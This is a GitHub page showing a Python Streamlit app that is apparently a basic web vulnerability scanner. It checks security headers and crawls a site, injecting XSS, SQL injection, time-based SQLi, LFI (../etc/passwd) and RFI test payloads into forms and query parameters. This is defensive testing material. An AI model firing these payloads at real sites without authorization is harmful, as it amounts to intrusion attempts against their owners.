-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathvulnerabilityscanner.py
More file actions
310 lines (253 loc) · 14 KB
/
vulnerabilityscanner.py
File metadata and controls
310 lines (253 loc) · 14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
# vulnerability_scanner_gui.py
import requests
import streamlit as st
import json
import time
import argparse
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
from collections import deque
# Global state to prevent infinite loops in crawling
scanned_urls = set()
def check_insecure_headers(url, status_container):
"""
Checks for missing or insecure HTTP security headers.
Returns a dictionary of results.
"""
status_container.info(f"Checking headers for: {url}")
results = []
try:
response = requests.get(url, timeout=10)
headers = response.headers
# Check for Content Security Policy (CSP)
if 'Content-Security-Policy' in headers:
results.append({"name": "CSP", "status": "PASS", "description": "Content-Security-Policy header found. This helps prevent XSS."})
else:
results.append({"name": "CSP", "status": "FAIL", "description": "Content-Security-Policy header is missing. Consider adding one to mitigate XSS."})
# Check for X-Frame-Options
if 'X-Frame-Options' in headers and headers['X-Frame-Options'].lower() in ['deny', 'sameorigin']:
results.append({"name": "X-Frame-Options", "status": "PASS", "description": "X-Frame-Options header is set correctly. This mitigates clickjacking."})
else:
results.append({"name": "X-Frame-Options", "status": "FAIL", "description": "X-Frame-Options header is missing or insecure. This can lead to clickjacking."})
# Check for Strict-Transport-Security (HSTS)
if 'Strict-Transport-Security' in headers:
results.append({"name": "HSTS", "status": "PASS", "description": "Strict-Transport-Security (HSTS) header found. This enforces HTTPS."})
else:
results.append({"name": "HSTS", "status": "FAIL", "description": "Strict-Transport-Security (HSTS) header is missing. This can lead to protocol downgrade attacks."})
# Check for X-Content-Type-Options
if 'X-Content-Type-Options' in headers and headers['X-Content-Type-Options'].lower() == 'nosniff':
results.append({"name": "X-Content-Type-Options", "status": "PASS", "description": "X-Content-Type-Options header set to 'nosniff'. This prevents MIME type sniffing."})
else:
results.append({"name": "X-Content-Type-Options", "status": "FAIL", "description": "X-Content-Type-Options header is missing. This can lead to MIME type sniffing attacks."})
except requests.exceptions.RequestException as e:
results.append({"name": "Headers Check", "status": "ERROR", "description": f"Failed to connect to URL: {e}"})
except Exception as e:
results.append({"name": "Headers Check", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
return results
def check_mixed_content(url, status_container):
"""
Performs a basic check for mixed content by verifying the protocol.
"""
status_container.info(f"Checking for mixed content for: {url}")
if url.startswith("https://"):
return {"name": "Mixed Content", "status": "PASS", "description": "The URL uses HTTPS, which is secure."}
else:
return {"name": "Mixed Content", "status": "FAIL", "description": "The URL uses HTTP. This can expose user data and resources. Migrate to HTTPS."}
def check_forms_for_xss_and_sqli(url, status_container):
"""
Finds forms on a page and injects payloads into them to check for vulnerabilities.
"""
status_container.info(f"Checking forms for XSS and SQLi on: {url}")
results = []
xss_payloads = ['"><script>alert(1)</script>']
sqli_payloads = ["' OR '1'='1"]
try:
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
if not forms:
results.append({"name": "Form Scan", "status": "INFO", "description": "No forms found on the page."})
for form in forms:
action_url = form.get('action')
if not action_url:
continue
full_action_url = urljoin(url, action_url)
method = form.get('method', 'get').lower()
inputs = form.find_all('input', {'type': ['text', 'password', 'hidden']})
form_data = {}
for inp in inputs:
form_data[inp.get('name')] = 'test' # Default test value
# Test with XSS payloads
for payload in xss_payloads:
for name in form_data:
temp_data = form_data.copy()
temp_data[name] = payload
if method == 'post':
res = requests.post(full_action_url, data=temp_data, timeout=10)
else:
res = requests.get(full_action_url, params=temp_data, timeout=10)
if payload in res.text:
results.append({"name": "Form XSS", "status": "FAIL", "description": f"Potential XSS vulnerability found in form at {full_action_url} with payload {payload}"})
# Test with SQLi payloads
for payload in sqli_payloads:
for name in form_data:
temp_data = form_data.copy()
temp_data[name] = payload
if method == 'post':
res = requests.post(full_action_url, data=temp_data, timeout=10)
else:
res = requests.get(full_action_url, params=temp_data, timeout=10)
if "syntax error" in res.text.lower() or "mysql" in res.text.lower():
results.append({"name": "Form SQLi", "status": "WARNING", "description": f"Possible SQL injection vulnerability in form at {full_action_url} with payload {payload}"})
except requests.exceptions.RequestException as e:
results.append({"name": "Form Scan", "status": "ERROR", "description": f"Failed to check forms: {e}"})
except Exception as e:
results.append({"name": "Form Scan", "status": "ERROR", "description": f"An unexpected error occurred during form scan: {e}"})
return results
def check_time_based_sqli(url, status_container):
"""
Performs a time-based SQL injection check.
"""
status_container.info(f"Checking for time-based SQLi for: {url}")
time_based_payloads = [
"' OR 1=1 AND SLEEP(5)--",
"' OR 1=1 AND pg_sleep(5)--"
]
results = []
try:
# Get baseline response time
start_time = time.time()
requests.get(url, timeout=10)
baseline_time = time.time() - start_time
for payload in time_based_payloads:
test_url = f"{url}?id={requests.utils.quote(payload)}"
start_time = time.time()
response = requests.get(test_url, timeout=10)
elapsed_time = time.time() - start_time
if elapsed_time > baseline_time + 3: # Add a buffer
results.append({"name": "Time-based SQLi", "status": "FAIL", "description": f"Potential time-based SQL injection vulnerability found. Request with payload took {elapsed_time:.2f}s, compared to baseline of {baseline_time:.2f}s."})
else:
results.append({"name": "Time-based SQLi", "status": "PASS", "description": f"No obvious time-based SQL injection vulnerability found with payload '{payload}'."})
except requests.exceptions.RequestException as e:
results.append({"name": "Time-based SQLi", "status": "ERROR", "description": f"Failed to perform time-based SQLi check: {e}"})
except Exception as e:
results.append({"name": "Time-based SQLi", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
return results
def check_file_inclusion(url, status_container):
"""
Checks for Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities.
"""
status_container.info(f"Checking for file inclusion vulnerabilities for: {url}")
lfi_payloads = ["../etc/passwd", "..\\boot.ini"]
rfi_payloads = ["http://example.com/malicious.php"]
results = []
try:
for payload in lfi_payloads:
test_url = f"{url}?file={requests.utils.quote(payload)}"
response = requests.get(test_url, timeout=10)
if "root:" in response.text or "[boot loader]" in response.text:
results.append({"name": "LFI", "status": "FAIL", "description": f"Potential LFI vulnerability found. Server responded with contents of '{payload}'."})
else:
results.append({"name": "LFI", "status": "PASS", "description": f"No obvious LFI vulnerability found with payload '{payload}'."})
for payload in rfi_payloads:
test_url = f"{url}?file={requests.utils.quote(payload)}"
response = requests.get(test_url, timeout=10)
# A real check would involve setting up a listener. Here, we just check for a response.
if response.status_code == 200:
results.append({"name": "RFI", "status": "WARNING", "description": f"Potential RFI vulnerability. The server accepted a remote file inclusion payload. Further testing is needed."})
else:
results.append({"name": "RFI", "status": "PASS", "description": f"No obvious RFI vulnerability found with payload '{payload}'."})
except requests.exceptions.RequestException as e:
results.append({"name": "File Inclusion", "status": "ERROR", "description": f"Failed to perform file inclusion checks: {e}"})
except Exception as e:
results.append({"name": "File Inclusion", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
return results
def crawl_and_scan(start_url, max_depth, status_container):
"""
Recursively crawls a website and scans each discovered URL.
"""
global scanned_urls
to_scan = deque([(start_url, 0)])
all_results = []
scanned_urls.add(start_url)
status_container.info(f"Starting crawl and scan on {start_url}...")
while to_scan:
current_url, depth = to_scan.popleft()
if depth > max_depth:
continue
status_container.info(f"Scanning URL: {current_url} (Depth: {depth})")
try:
response = requests.get(current_url, timeout=10)
soup = BeautifulSoup(response.text, 'html.parser')
# Run all checks on the current URL
all_results.extend(check_insecure_headers(current_url, status_container))
all_results.append(check_mixed_content(current_url, status_container))
all_results.extend(check_forms_for_xss_and_sqli(current_url, status_container))
all_results.extend(check_time_based_sqli(current_url, status_container))
all_results.extend(check_file_inclusion(current_url, status_container))
# Find new links to scan
for link in soup.find_all('a', href=True):
href = link['href']
absolute_url = urljoin(current_url, href)
# Check if the URL is on the same domain and hasn't been scanned
if urlparse(absolute_url).netloc == urlparse(start_url).netloc and absolute_url not in scanned_urls:
to_scan.append((absolute_url, depth + 1))
scanned_urls.add(absolute_url)
except requests.exceptions.RequestException as e:
all_results.append({"name": "Crawl Error", "status": "ERROR", "description": f"Failed to crawl {current_url}: {e}"})
except Exception as e:
all_results.append({"name": "Crawl Error", "status": "ERROR", "description": f"An unexpected error occurred during crawl: {e}"})
return all_results
def display_results(results):
st.subheader("Scan Report")
if not results:
st.info("No vulnerabilities found or scan failed.")
return
# Count vulnerabilities by status
status_counts = {}
for r in results:
status = r.get("status")
status_counts[status] = status_counts.get(status, 0) + 1
st.markdown(f"""
**Total Findings**: {len(results)}
**Passing Checks**: {status_counts.get("PASS", 0)}
**Failures**: {status_counts.get("FAIL", 0)}
**Warnings**: {status_counts.get("WARNING", 0)}
**Informational**: {status_counts.get("INFO", 0)}
**Errors**: {status_counts.get("ERROR", 0)}
""")
for result in results:
status = result.get("status")
name = result.get("name")
description = result.get("description")
if status == "PASS":
st.success(f"✅ {name}: {description}")
elif status == "FAIL":
st.error(f"❌ {name}: {description}")
elif status == "WARNING":
st.warning(f"⚠️ {name}: {description}")
elif status == "ERROR":
st.error(f"🛑 {name}: {description}")
else: # INFO
st.info(f"ℹ️ {name}: {description}")
st.title("WebGuardian: Web Vulnerability Scanner")
st.markdown("Enter a URL to perform a comprehensive security scan.")
url = st.text_input("Target URL", "https://example.com")
max_depth = st.slider("Maximum Crawl Depth", 0, 5, 2)
if st.button("Start Scan"):
if not url:
st.error("Please enter a valid URL.")
else:
# Reset scanned URLs for a new scan
scanned_urls.clear()
st.subheader("Live Scan Status")
status_container = st.container()
# Use a spinner for the overall scan duration
with st.spinner("Scanning... this may take a moment."):
all_results = crawl_and_scan(url, max_depth, status_container)
display_results(all_results)
# Save results to a JSON file
output_filename = "scan_report.json"
with open(output_filename, 'w') as f:
json.dump(all_results, f, indent=4)
st.success(f"Scan complete! A detailed JSON report has been saved to '{output_filename}'.")